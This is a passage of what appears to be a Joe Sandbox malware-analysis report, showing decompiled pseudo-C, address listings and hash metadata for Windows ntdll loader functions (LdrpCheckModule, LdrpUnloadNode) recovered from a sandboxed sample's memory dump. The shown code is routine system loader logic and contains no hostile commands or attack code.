                                                                                                                                                                            								_v8 = _t76;
                                                                                                                                                                            								if(E1D841C7D(_t76, _t130, _t148) != 0) {
                                                                                                                                                                            									_t117 = _v8;
                                                                                                                                                                            									_t31 = _t117 + 2; // 0x2
                                                                                                                                                                            									_t131 = _t31;
                                                                                                                                                                            									do {
                                                                                                                                                                            										_t78 =  *_t117;
                                                                                                                                                                            										_t117 = _t117 + 2;
                                                                                                                                                                            										__eflags = _t78 - _v12;
                                                                                                                                                                            									} while (_t78 != _v12);
                                                                                                                                                                            									_t114 = _t117 - _t131 >> 1;
                                                                                                                                                                            									__eflags =  *0x1d9168d8;
                                                                                                                                                                            									if( *0x1d9168d8 == 0) {
                                                                                                                                                                            										_t33 = _t114 + 2; // 0x0
                                                                                                                                                                            										_t79 = _t33;
                                                                                                                                                                            									} else {
                                                                                                                                                                            										_t104 =  *0x1d915d4c; // 0x0
                                                                                                                                                                            										_t79 = _t104 + 1 + _t114;
                                                                                                                                                                            									}
                                                                                                                                                                            									_v28 = _t79;
                                                                                                                                                                            									_t132 = E1D835D90(_t114,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t79 + _t79);
                                                                                                                                                                            									_v24 = _t132;
                                                                                                                                                                            									__eflags = _t132;
                                                                                                                                                                            									if(_t132 != 0) {
                                                                                                                                                                            										_t119 =  *0x1d9168d8; // 0x0
                                                                                                                                                                            										__eflags = _t119;
                                                                                                                                                                            										if(_t119 == 0) {
                                                                                                                                                                            											_t120 = _v8;
                                                                                                                                                                            											_t52 = _t120 + 2; // 0x2
                                                                                                                                                                            											_v40 = _t52;
                                                                                                                                                                            											do {
                                                                                                                                                                            												_t84 =  *_t120;
                                                                                                                                                                            												_t120 = _t120 + 2;
                                                                                                                                                                            												__eflags = _t84 - _v12;
                                                                                                                                                                            											} while (_t84 != _v12);
                                                                                                                                                                            											_t121 = _t120 - _v40;
                                                                                                                                                                            											__eflags = _t121;
                                                                                                                                                                            											_t114 = _t121 >> 1;
                                                                                                                                                                            											E1D8688C0(_t132, _v8, (_t121 >> 1) + (_t121 >> 1));
                                                                                                                                                                            											_t139 = _t139 + 0xc;
                                                                                                                                                                            											L39:
                                                                                                                                                                            											 *0x1d9168d8 = _v24;
                                                                                                                                                                            											 *0x1d915d4c = _v28;
                                                                                                                                                                            											goto L9;
                                                                                                                                                                            										}
                                                                                                                                                                            										_t89 =  *0x1d915d4c; // 0x0
                                                                                                                                                                            										_t90 = _t89 + _t89;
                                                                                                                                                                            										__eflags = _t90;
                                                                                                                                                                            										_v40 = _t90;
                                                                                                                                                                            										E1D8688C0(_t132, _t119, _t90);
                                                                                                                                                                            										_t133 = _v8;
                                                                                                                                                                            										_t140 = _t139 + 0xc;
                                                                                                                                                                            										_t122 = _v8;
                                                                                                                                                                            										_t43 = _t122 + 2; // 0x2
                                                                                                                                                                            										_v8 = _t43;
                                                                                                                                                                            										do {
                                                                                                                                                                            											_t93 =  *_t122;
                                                                                                                                                                            											_t122 = _t122 + 2;
                                                                                                                                                                            											__eflags = _t93 - _v12;
                                                                                                                                                                            										} while (_t93 != _v12);
                                                                                                                                                                            										_t114 = _v40 + 2;
                                                                                                                                                                            										E1D8688C0(_v24 + _v40 + 2, _t133, (_t122 - _v8 >> 1) + (_t122 - _v8 >> 1));
                                                                                                                                                                            										_t139 = _t140 + 0xc;
                                                                                                                                                                            										E1D833BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *0x1d9168d8);
                                                                                                                                                                            										goto L39;
                                                                                                                                                                            									} else {
                                                                                                                                                                            										_t101 =  *0x1d9137c0; // 0x0
                                                                                                                                                                            										__eflags = _t101 & 0x00000003;
                                                                                                                                                                            										if((_t101 & 0x00000003) != 0) {
                                                                                                                                                                            											_push("Failed to allocated memory for shimmed module list\n");
                                                                                                                                                                            											__eflags = 0;
                                                                                                                                                                            											_push(0);
                                                                                                                                                                            											_push("LdrpCheckModule");
                                                                                                                                                                            											_push(0xaf4);
                                                                                                                                                                            											_push("minkernel\\ntdll\\ldrinit.c");
                                                                                                                                                                            											E1D89E692();
                                                                                                                                                                            											_t101 =  *0x1d9137c0; // 0x0
                                                                                                                                                                            											_t139 = _t139 + 0x14;
                                                                                                                                                                            										}
                                                                                                                                                                            										__eflags = _t101 & 0x00000010;
                                                                                                                                                                            										if((_t101 & 0x00000010) != 0) {
                                                                                                                                                                            											asm("int3");
                                                                                                                                                                            										}
                                                                                                                                                                            										goto L9;
                                                                                                                                                                            									}
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            							L9:
                                                                                                                                                                            							E1D840C2C(_t138, 1, _t114);
                                                                                                                                                                            							 *(_t138 + 0x34) =  *(_t138 + 0x34) | 0x00000008;
                                                                                                                                                                            							E1D83DF36( *((intOrPtr*)(_t138 + 0x18)), _t138 + 0x24, 0x14ad);
                                                                                                                                                                            							_t113 = _v16;
                                                                                                                                                                            							_t67 =  *((intOrPtr*)(_v32 + 4));
                                                                                                                                                                            							_v32 = _t67;
                                                                                                                                                                            						} while (_t67 != _t108);
                                                                                                                                                                            						_t137 = _v36;
                                                                                                                                                                            						goto L11;
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            			}











































                                                                                                                                                                            0x1d840af6
                                                                                                                                                                            0x1d840af8
                                                                                                                                                                            0x1d840afa
                                                                                                                                                                            0x1d840afd
                                                                                                                                                                            0x1d840b00
                                                                                                                                                                            0x1d840b06
                                                                                                                                                                            0x1d889ea5
                                                                                                                                                                            0x1d889ea5
                                                                                                                                                                            0x1d840b13
                                                                                                                                                                            0x1d840bd3
                                                                                                                                                                            0x1d840be3
                                                                                                                                                                            0x1d840be3
                                                                                                                                                                            0x1d840be5
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d840bd8
                                                                                                                                                                            0x1d840bdb
                                                                                                                                                                            0x1d840be0
                                                                                                                                                                            0x1d840be0
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d840b19
                                                                                                                                                                            0x1d840b19
                                                                                                                                                                            0x1d840b27
                                                                                                                                                                            0x1d840b2a
                                                                                                                                                                            0x1d840b36
                                                                                                                                                                            0x1d840c0d
                                                                                                                                                                            0x1d840c15
                                                                                                                                                                            0x1d840c20
                                                                                                                                                                            0x1d840c21
                                                                                                                                                                            0x1d840c23
                                                                                                                                                                            0x1d840c25
                                                                                                                                                                            0x1d840c25
                                                                                                                                                                            0x1d840b3e
                                                                                                                                                                            0x1d840b40
                                                                                                                                                                            0x1d840b43
                                                                                                                                                                            0x1d840b46
                                                                                                                                                                            0x1d840b4b
                                                                                                                                                                            0x1d840bc2
                                                                                                                                                                            0x1d840bc2
                                                                                                                                                                            0x1d840bc7
                                                                                                                                                                            0x1d840bd2
                                                                                                                                                                            0x1d840b4d
                                                                                                                                                                            0x1d840b50
                                                                                                                                                                            0x1d840b56
                                                                                                                                                                            0x1d840b59
                                                                                                                                                                            0x1d840b59
                                                                                                                                                                            0x1d840b5e
                                                                                                                                                                            0x1d889eb1
                                                                                                                                                                            0x1d889eb3
                                                                                                                                                                            0x1d889eb8
                                                                                                                                                                            0x1d889ebb
                                                                                                                                                                            0x1d889ebd
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d889ec3
                                                                                                                                                                            0x1d840b66
                                                                                                                                                                            0x1d840b69
                                                                                                                                                                            0x1d840b70
                                                                                                                                                                            0x1d840bec
                                                                                                                                                                            0x1d840bf3
                                                                                                                                                                            0x1d840bfa
                                                                                                                                                                            0x1d840bfc
                                                                                                                                                                            0x1d840c02
                                                                                                                                                                            0x1d840c04
                                                                                                                                                                            0x1d840c04
                                                                                                                                                                            0x1d840bf3
                                                                                                                                                                            0x1d840b72
                                                                                                                                                                            0x1d840b76
                                                                                                                                                                            0x1d840b78
                                                                                                                                                                            0x1d840b7b
                                                                                                                                                                            0x1d840b7f
                                                                                                                                                                            0x1d840b80
                                                                                                                                                                            0x1d840b8a
                                                                                                                                                                            0x1d889ec8
                                                                                                                                                                            0x1d889ecb
                                                                                                                                                                            0x1d889ecb
                                                                                                                                                                            0x1d889ece
                                                                                                                                                                            0x1d889ece
                                                                                                                                                                            0x1d889ed1
                                                                                                                                                                            0x1d889ed4
                                                                                                                                                                            0x1d889ed4
                                                                                                                                                                            0x1d889edc
                                                                                                                                                                            0x1d889ede
                                                                                                                                                                            0x1d889ee5
                                                                                                                                                                            0x1d889ef1
                                                                                                                                                                            0x1d889ef1
                                                                                                                                                                            0x1d889ee7
                                                                                                                                                                            0x1d889ee7
                                                                                                                                                                            0x1d889eed
                                                                                                                                                                            0x1d889eed
                                                                                                                                                                            0x1d889ef4
                                                                                                                                                                            0x1d889f0a
                                                                                                                                                                            0x1d889f0c
                                                                                                                                                                            0x1d889f0f
                                                                                                                                                                            0x1d889f11
                                                                                                                                                                            0x1d889f4e
                                                                                                                                                                            0x1d889f54
                                                                                                                                                                            0x1d889f56
                                                                                                                                                                            0x1d889fbb
                                                                                                                                                                            0x1d889fbe
                                                                                                                                                                            0x1d889fc1
                                                                                                                                                                            0x1d889fc4
                                                                                                                                                                            0x1d889fc4
                                                                                                                                                                            0x1d889fc7
                                                                                                                                                                            0x1d889fca
                                                                                                                                                                            0x1d889fca
                                                                                                                                                                            0x1d889fd0
                                                                                                                                                                            0x1d889fd0
                                                                                                                                                                            0x1d889fd3
                                                                                                                                                                            0x1d889fdd
                                                                                                                                                                            0x1d889fe2
                                                                                                                                                                            0x1d889fe5
                                                                                                                                                                            0x1d889fe8
                                                                                                                                                                            0x1d889ff0
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d889ff0
                                                                                                                                                                            0x1d889f58
                                                                                                                                                                            0x1d889f5d
                                                                                                                                                                            0x1d889f5d
                                                                                                                                                                            0x1d889f62
                                                                                                                                                                            0x1d889f65
                                                                                                                                                                            0x1d889f6a
                                                                                                                                                                            0x1d889f6d
                                                                                                                                                                            0x1d889f70
                                                                                                                                                                            0x1d889f72
                                                                                                                                                                            0x1d889f75
                                                                                                                                                                            0x1d889f78
                                                                                                                                                                            0x1d889f78
                                                                                                                                                                            0x1d889f7b
                                                                                                                                                                            0x1d889f7e
                                                                                                                                                                            0x1d889f7e
                                                                                                                                                                            0x1d889f93
                                                                                                                                                                            0x1d889f9a
                                                                                                                                                                            0x1d889f9f
                                                                                                                                                                            0x1d889fb4
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d889f13
                                                                                                                                                                            0x1d889f13
                                                                                                                                                                            0x1d889f18
                                                                                                                                                                            0x1d889f1a
                                                                                                                                                                            0x1d889f1c
                                                                                                                                                                            0x1d889f21
                                                                                                                                                                            0x1d889f23
                                                                                                                                                                            0x1d889f24
                                                                                                                                                                            0x1d889f29
                                                                                                                                                                            0x1d889f2e
                                                                                                                                                                            0x1d889f33
                                                                                                                                                                            0x1d889f38
                                                                                                                                                                            0x1d889f3d
                                                                                                                                                                            0x1d889f3d
                                                                                                                                                                            0x1d889f40
                                                                                                                                                                            0x1d889f42
                                                                                                                                                                            0x1d889f48
                                                                                                                                                                            0x1d889f48
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d889f42
                                                                                                                                                                            0x1d889f11
                                                                                                                                                                            0x1d840b8a
                                                                                                                                                                            0x1d840b90
                                                                                                                                                                            0x1d840b96
                                                                                                                                                                            0x1d840ba1
                                                                                                                                                                            0x1d840baa
                                                                                                                                                                            0x1d840bb2
                                                                                                                                                                            0x1d840bb5
                                                                                                                                                                            0x1d840bb8
                                                                                                                                                                            0x1d840bbb
                                                                                                                                                                            0x1d840bbf
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d840bbf
                                                                                                                                                                            0x1d840b4b

                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            • Failed to allocated memory for shimmed module list, xrefs: 1D889F1C
                                                                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 1D889F2E
                                                                                                                                                                            • LdrpCheckModule, xrefs: 1D889F24
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000B.00000002.1344068848.000000001D7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7F0000, based on PE: true
                                                                                                                                                                            • Associated: 0000000B.00000002.1346656449.000000001D919000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000B.00000002.1346687966.000000001D91D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d7f0000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DebugPrintTimes
                                                                                                                                                                            • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                                                            • API String ID: 3446177414-161242083
                                                                                                                                                                            • Opcode ID: 7b1264f3eeb180e41c93b5fe791a126f9ef12f5e305d5c2d4ee56b966bf07e1e
                                                                                                                                                                            • Instruction ID: 6dc76d162010a7e2601b3553cf53da0c4d1acd9d1bb8b574c1d09be94ea8732a
                                                                                                                                                                            • Opcode Fuzzy Hash: 7b1264f3eeb180e41c93b5fe791a126f9ef12f5e305d5c2d4ee56b966bf07e1e
                                                                                                                                                                            • Instruction Fuzzy Hash: C9711274A04259DFCB05DFA8C880BBEB7F0FB44618F26846DE519E7251E734AA42CB52
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 66%
                                                                                                                                                                            			E1D849723(signed int __ecx, void* __edx) {
                                                                                                                                                                            				char _v4;
                                                                                                                                                                            				intOrPtr* _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                            				intOrPtr* _v28;
                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                            				void* __edi;
                                                                                                                                                                            				void* __esi;
                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                            				intOrPtr _t49;
                                                                                                                                                                            				signed int _t50;
                                                                                                                                                                            				signed int _t60;
                                                                                                                                                                            				signed int _t69;
                                                                                                                                                                            				signed int _t70;
                                                                                                                                                                            				intOrPtr _t79;
                                                                                                                                                                            				signed int _t82;
                                                                                                                                                                            				signed int _t83;
                                                                                                                                                                            				intOrPtr* _t85;
                                                                                                                                                                            				intOrPtr _t86;
                                                                                                                                                                            				signed int _t87;
                                                                                                                                                                            				void* _t88;
                                                                                                                                                                            				signed int _t89;
                                                                                                                                                                            				signed int _t93;
                                                                                                                                                                            				signed int _t99;
                                                                                                                                                                            				signed int* _t100;
                                                                                                                                                                            				void* _t102;
                                                                                                                                                                            				void* _t103;
                                                                                                                                                                            				signed int _t104;
                                                                                                                                                                            				intOrPtr* _t105;
                                                                                                                                                                            				void* _t107;
                                                                                                                                                                            				signed int _t108;
                                                                                                                                                                            				intOrPtr* _t110;
                                                                                                                                                                            				signed int _t112;
                                                                                                                                                                            				signed int _t113;
                                                                                                                                                                            				void* _t115;
                                                                                                                                                                            
                                                                                                                                                                            				_t87 = __ecx;
                                                                                                                                                                            				_t115 = (_t113 & 0xfffffff8) - 0x14;
                                                                                                                                                                            				_t110 = __ecx;
                                                                                                                                                                            				_v16 =  *[fs:0x30];
                                                                                                                                                                            				_t82 = 0;
                                                                                                                                                                            				_v12 = __ecx;
                                                                                                                                                                            				_push(_t103);
                                                                                                                                                                            				if( *((intOrPtr*)(__ecx + 0x20)) == 0xfffffffc) {
                                                                                                                                                                            					L9:
                                                                                                                                                                            					_t13 = _t110 + 0x20;
                                                                                                                                                                            					 *_t13 =  *(_t110 + 0x20) | 0xffffffff;
                                                                                                                                                                            					__eflags =  *_t13;
                                                                                                                                                                            					E1D84A4E3(_t82, _t87, _t103, _t110,  *_t13);
                                                                                                                                                                            					L10:
                                                                                                                                                                            					__eflags =  *0x1d9165f0 - _t82; // 0x0
                                                                                                                                                                            					if(__eflags != 0) {
                                                                                                                                                                            						_t99 =  *0x7ffe0330;
                                                                                                                                                                            						_t83 =  *0x1d919214; // 0x0
                                                                                                                                                                            						_t88 = 0x20;
                                                                                                                                                                            						_t87 = _t88 - (_t99 & 0x0000001f);
                                                                                                                                                                            						asm("ror ebx, cl");
                                                                                                                                                                            						_t82 = _t83 ^ _t99;
                                                                                                                                                                            					}
                                                                                                                                                                            					E1D82FED0(0x1d9132d8);
                                                                                                                                                                            					_t49 =  *_t110;
                                                                                                                                                                            					while(1) {
                                                                                                                                                                            						_v20 = _t49;
                                                                                                                                                                            						__eflags = _t49 - _t110;
                                                                                                                                                                            						if(_t49 == _t110) {
                                                                                                                                                                            							break;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t16 = _t49 - 0x54; // 0x778b36a0
                                                                                                                                                                            						_t108 = _t16;
                                                                                                                                                                            						__eflags =  *(_t108 + 0x34) & 0x00000008;
                                                                                                                                                                            						if(( *(_t108 + 0x34) & 0x00000008) != 0) {
                                                                                                                                                                            							_push(_t87);
                                                                                                                                                                            							_t102 = 2;
                                                                                                                                                                            							E1D840C2C(_t108, _t102);
                                                                                                                                                                            							__eflags = _t82;
                                                                                                                                                                            							if(_t82 != 0) {
                                                                                                                                                                            								 *0x1d9191e0(_t108);
                                                                                                                                                                            								 *_t82();
                                                                                                                                                                            							}
                                                                                                                                                                            							_t87 = _t108;
                                                                                                                                                                            							E1D8298DE(_t87, 1);
                                                                                                                                                                            							_t79 = _v24;
                                                                                                                                                                            							__eflags =  *(_t79 + 0x68) & 0x00000100;
                                                                                                                                                                            							if(( *(_t79 + 0x68) & 0x00000100) != 0) {
                                                                                                                                                                            								_t87 = _t108;
                                                                                                                                                                            								E1D8A85AA(_t87);
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						__eflags =  *0x1d9137c0 & 0x00000005;
                                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                                            							_t43 = _t108 + 0x24; // -48
                                                                                                                                                                            							E1D89E692("minkernel\\ntdll\\ldrsnap.c", 0xcdd, "LdrpUnloadNode", 2, "Unmapping DLL \"%wZ\"\n", _t43);
                                                                                                                                                                            							_t115 = _t115 + 0x18;
                                                                                                                                                                            						}
                                                                                                                                                                            						_push(0);
                                                                                                                                                                            						_push( *((intOrPtr*)(_t108 + 0x18)));
                                                                                                                                                                            						E1D84A390(_t82, _t87, _t108, _t110, __eflags);
                                                                                                                                                                            						_t49 =  *_v28;
                                                                                                                                                                            					}
                                                                                                                                                                            					_push(0x1d9132d8);
                                                                                                                                                                            					_t50 = E1D82E740(_t87);
                                                                                                                                                                            					while(1) {
                                                                                                                                                                            						L3:
                                                                                                                                                                            						_t89 =  *(_t110 + 0x18);
                                                                                                                                                                            						if(_t89 == 0) {
                                                                                                                                                                            							break;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t104 =  *_t89;
                                                                                                                                                                            						__eflags = _t104 - _t89;
                                                                                                                                                                            						if(_t104 != _t89) {
                                                                                                                                                                            							_t50 =  *_t104;
                                                                                                                                                                            							 *_t89 = _t50;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							_t32 = _t110 + 0x18;
                                                                                                                                                                            							 *_t32 =  *(_t110 + 0x18) & 0x00000000;
                                                                                                                                                                            							__eflags =  *_t32;
                                                                                                                                                                            						}
                                                                                                                                                                            						__eflags = _t104;
                                                                                                                                                                            						if(_t104 == 0) {
                                                                                                                                                                            							break;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							L1D832330(_t50, 0x1d916668);
                                                                                                                                                                            							_t86 =  *((intOrPtr*)(_t104 + 4));
                                                                                                                                                                            							_t35 = _t104 + 8; // 0x8
                                                                                                                                                                            							_t100 = _t35;
                                                                                                                                                                            							_t93 =  *(_t86 + 0x1c);
                                                                                                                                                                            							_t60 =  *_t93;
                                                                                                                                                                            							_v16 = _t60;
                                                                                                                                                                            							__eflags = _t60 - _t100;
                                                                                                                                                                            							if(_t60 == _t100) {
                                                                                                                                                                            								L27:
                                                                                                                                                                            								 *_t93 =  *_t100;
                                                                                                                                                                            								__eflags =  *(_t86 + 0x1c) - _t100;
                                                                                                                                                                            								if(__eflags == 0) {
                                                                                                                                                                            									asm("sbb eax, eax");
                                                                                                                                                                            									_t69 =  ~(_t93 - _t100) & _t93;
                                                                                                                                                                            									__eflags = _t69;
                                                                                                                                                                            									 *(_t86 + 0x1c) = _t69;
                                                                                                                                                                            								}
                                                                                                                                                                            								_push( &_v4);
                                                                                                                                                                            								E1D83D963(_t86, _t86, 0, _t104, _t110, __eflags);
                                                                                                                                                                            								E1D8324D0(0x1d916668);
                                                                                                                                                                            								__eflags = _v12;
                                                                                                                                                                            								if(_v12 != 0) {
                                                                                                                                                                            									E1D849723(_t86, 0);
                                                                                                                                                                            								}
                                                                                                                                                                            								_t50 = E1D833BC0( *0x1d915d74, 0, _t104);
                                                                                                                                                                            								continue;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t112 = _t60;
                                                                                                                                                                            							do {
                                                                                                                                                                            								_t70 =  *_t112;
                                                                                                                                                                            								_t93 = _t112;
                                                                                                                                                                            								_t112 = _t70;
                                                                                                                                                                            								__eflags = _t70 - _t100;
                                                                                                                                                                            							} while (_t70 != _t100);
                                                                                                                                                                            							_t110 = _v8;
                                                                                                                                                                            							goto L27;
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					_t105 =  *_t110;
                                                                                                                                                                            					 *(_t110 + 0x20) = 0xfffffffe;
                                                                                                                                                                            					if(_t105 == _t110) {
                                                                                                                                                                            						L8:
                                                                                                                                                                            						return _t50;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						goto L5;
                                                                                                                                                                            					}
                                                                                                                                                                            					do {
                                                                                                                                                                            						L5:
                                                                                                                                                                            						_t85 =  *_t105;
                                                                                                                                                                            						_t107 = _t105 + 0xffffffac;
                                                                                                                                                                            						 *(_t107 + 0x34) =  *(_t107 + 0x34) | 0x00000002;
                                                                                                                                                                            						E1D849938(L1D832330(_t50, 0x1d916668), _t107);
                                                                                                                                                                            						if(( *(_t107 + 0x34) & 0x00000080) != 0) {
                                                                                                                                                                            							_t28 = _t107 + 0x74; // -56
                                                                                                                                                                            							L1D849B40(_t85, _t107, _t110, 0x1d9167ac);
                                                                                                                                                                            							_t29 = _t107 + 0x68; // -68
                                                                                                                                                                            							L1D849B40(_t85, _t107, _t110, 0x1d9167a4);
                                                                                                                                                                            							 *(_t107 + 0x20) =  *(_t107 + 0x20) & 0x00000000;
                                                                                                                                                                            						}
                                                                                                                                                                            						E1D8324D0(0x1d916668);
                                                                                                                                                                            						if( *0x1d915d70 != 0) {
                                                                                                                                                                            							E1D85680F(_t107);
                                                                                                                                                                            						}
                                                                                                                                                                            						_t50 = E1D83D3E1(_t85, _t107, _t110);
                                                                                                                                                                            						_t105 = _t85;
                                                                                                                                                                            					} while (_t85 != _t110);
                                                                                                                                                                            					goto L8;
                                                                                                                                                                            				}
                                                                                                                                                                            				if( *((intOrPtr*)(__ecx + 0x20)) == 7) {
                                                                                                                                                                            					goto L10;
                                                                                                                                                                            				}
                                                                                                                                                                            				if( *((intOrPtr*)(__ecx + 0x20)) == 9) {
                                                                                                                                                                            					goto L9;
                                                                                                                                                                            				}
                                                                                                                                                                            				goto L3;
                                                                                                                                                                            			}








































                                                                                                                                                                            0x1d849723
                                                                                                                                                                            0x1d84972b
                                                                                                                                                                            0x1d849736
                                                                                                                                                                            0x1d849738
                                                                                                                                                                            0x1d84973c
                                                                                                                                                                            0x1d84973e
                                                                                                                                                                            0x1d849742
                                                                                                                                                                            0x1d849747
                                                                                                                                                                            0x1d8497bc
                                                                                                                                                                            0x1d8497bc
                                                                                                                                                                            0x1d8497bc
                                                                                                                                                                            0x1d8497bc
                                                                                                                                                                            0x1d8497c0
                                                                                                                                                                            0x1d8497c5
                                                                                                                                                                            0x1d8497c5
                                                                                                                                                                            0x1d8497cb
                                                                                                                                                                            0x1d849900
                                                                                                                                                                            0x1d849908
                                                                                                                                                                            0x1d849913
                                                                                                                                                                            0x1d849914
                                                                                                                                                                            0x1d849916
                                                                                                                                                                            0x1d849918
                                                                                                                                                                            0x1d849918
                                                                                                                                                                            0x1d8497d6
                                                                                                                                                                            0x1d8497db
                                                                                                                                                                            0x1d8497dd
                                                                                                                                                                            0x1d8497dd
                                                                                                                                                                            0x1d8497e1
                                                                                                                                                                            0x1d8497e3
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8497e5
                                                                                                                                                                            0x1d8497e5
                                                                                                                                                                            0x1d8497e8
                                                                                                                                                                            0x1d8497ec
                                                                                                                                                                            0x1d8497ee
                                                                                                                                                                            0x1d8497f1
                                                                                                                                                                            0x1d8497f4
                                                                                                                                                                            0x1d8497f9
                                                                                                                                                                            0x1d8497fb
                                                                                                                                                                            0x1d849922
                                                                                                                                                                            0x1d849928
                                                                                                                                                                            0x1d849928
                                                                                                                                                                            0x1d849803
                                                                                                                                                                            0x1d849805
                                                                                                                                                                            0x1d84980a
                                                                                                                                                                            0x1d84980e
                                                                                                                                                                            0x1d849815
                                                                                                                                                                            0x1d88dade
                                                                                                                                                                            0x1d88dae0
                                                                                                                                                                            0x1d88dae0
                                                                                                                                                                            0x1d849815
                                                                                                                                                                            0x1d84981b
                                                                                                                                                                            0x1d849822
                                                                                                                                                                            0x1d88daea
                                                                                                                                                                            0x1d88db04
                                                                                                                                                                            0x1d88db09
                                                                                                                                                                            0x1d88db09
                                                                                                                                                                            0x1d849828
                                                                                                                                                                            0x1d84982a
                                                                                                                                                                            0x1d84982d
                                                                                                                                                                            0x1d849836
                                                                                                                                                                            0x1d849836
                                                                                                                                                                            0x1d84983a
                                                                                                                                                                            0x1d84983f
                                                                                                                                                                            0x1d849755
                                                                                                                                                                            0x1d849755
                                                                                                                                                                            0x1d849755
                                                                                                                                                                            0x1d84975a
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d84986e
                                                                                                                                                                            0x1d849870
                                                                                                                                                                            0x1d849872
                                                                                                                                                                            0x1d84992f
                                                                                                                                                                            0x1d849931
                                                                                                                                                                            0x1d849878
                                                                                                                                                                            0x1d849878
                                                                                                                                                                            0x1d849878
                                                                                                                                                                            0x1d849878
                                                                                                                                                                            0x1d849878
                                                                                                                                                                            0x1d84987c
                                                                                                                                                                            0x1d84987e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d849884
                                                                                                                                                                            0x1d849889
                                                                                                                                                                            0x1d84988e
                                                                                                                                                                            0x1d849891
                                                                                                                                                                            0x1d849891
                                                                                                                                                                            0x1d849894
                                                                                                                                                                            0x1d849897
                                                                                                                                                                            0x1d849899
                                                                                                                                                                            0x1d84989d
                                                                                                                                                                            0x1d84989f
                                                                                                                                                                            0x1d8498b1
                                                                                                                                                                            0x1d8498b3
                                                                                                                                                                            0x1d8498b5
                                                                                                                                                                            0x1d8498b8
                                                                                                                                                                            0x1d8498c0
                                                                                                                                                                            0x1d8498c2
                                                                                                                                                                            0x1d8498c2
                                                                                                                                                                            0x1d8498c4
                                                                                                                                                                            0x1d8498c4
                                                                                                                                                                            0x1d8498cd
                                                                                                                                                                            0x1d8498d0
                                                                                                                                                                            0x1d8498da
                                                                                                                                                                            0x1d8498df
                                                                                                                                                                            0x1d8498e4
                                                                                                                                                                            0x1d8498e8
                                                                                                                                                                            0x1d8498e8
                                                                                                                                                                            0x1d8498f6
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8498f6
                                                                                                                                                                            0x1d8498a1
                                                                                                                                                                            0x1d8498a3
                                                                                                                                                                            0x1d8498a3
                                                                                                                                                                            0x1d8498a5
                                                                                                                                                                            0x1d8498a7
                                                                                                                                                                            0x1d8498a9
                                                                                                                                                                            0x1d8498a9
                                                                                                                                                                            0x1d8498ad
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8498ad
                                                                                                                                                                            0x1d84987e
                                                                                                                                                                            0x1d849760
                                                                                                                                                                            0x1d849762
                                                                                                                                                                            0x1d84976b
                                                                                                                                                                            0x1d8497b5
                                                                                                                                                                            0x1d8497bb
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d84976d
                                                                                                                                                                            0x1d84976d
                                                                                                                                                                            0x1d84976d
                                                                                                                                                                            0x1d84976f
                                                                                                                                                                            0x1d849777
                                                                                                                                                                            0x1d849782
                                                                                                                                                                            0x1d84978b
                                                                                                                                                                            0x1d849849
                                                                                                                                                                            0x1d849852
                                                                                                                                                                            0x1d849857
                                                                                                                                                                            0x1d849860
                                                                                                                                                                            0x1d849865
                                                                                                                                                                            0x1d849865
                                                                                                                                                                            0x1d849796
                                                                                                                                                                            0x1d8497a2
                                                                                                                                                                            0x1d88db13
                                                                                                                                                                            0x1d88db13
                                                                                                                                                                            0x1d8497aa
                                                                                                                                                                            0x1d8497af
                                                                                                                                                                            0x1d8497b1
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d84976d
                                                                                                                                                                            0x1d84974d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d849753
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000

                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000B.00000002.1344068848.000000001D7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7F0000, based on PE: true
